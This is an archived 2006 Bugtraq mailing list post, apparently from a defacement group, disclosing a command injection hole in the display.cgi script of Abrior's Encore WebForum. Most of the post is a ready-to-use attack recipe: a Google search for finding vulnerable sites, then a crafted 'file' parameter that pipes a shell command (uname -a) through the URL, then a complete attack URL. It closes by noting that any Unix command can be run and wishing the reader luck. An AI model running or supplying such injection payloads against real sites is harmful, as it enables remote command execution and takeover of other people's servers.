| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 20 Jun 2006 09:28:03 -0000
From: soltan_defacer@...oo.com
To: bugtraq@...urityfocus.com
Subject: display.cgi
#################### Azhteam Digital Security Team ######################
##############################################
Abrior's Encore WebForum ( display.cgi )
Find by : soltan_defacer
www.azhteam.com
# Greetings; s.defacer - azhteam - lvl3hr - edi.programe
##############################################
Bugs File : /forumcgi/display.cgi?
Display : http://www.target.com/encore/forumcgi/display.cgi?
1. search in Google --> allinurl:forumcgi/display.cgi?
2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code :
&page=anonymous&file=|uname%20-a|
4. Full Display like :
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix command available in here... Good Luck :P~
#################### Azhteam Digital Security Team ######################
Powered by blists - more mailing lists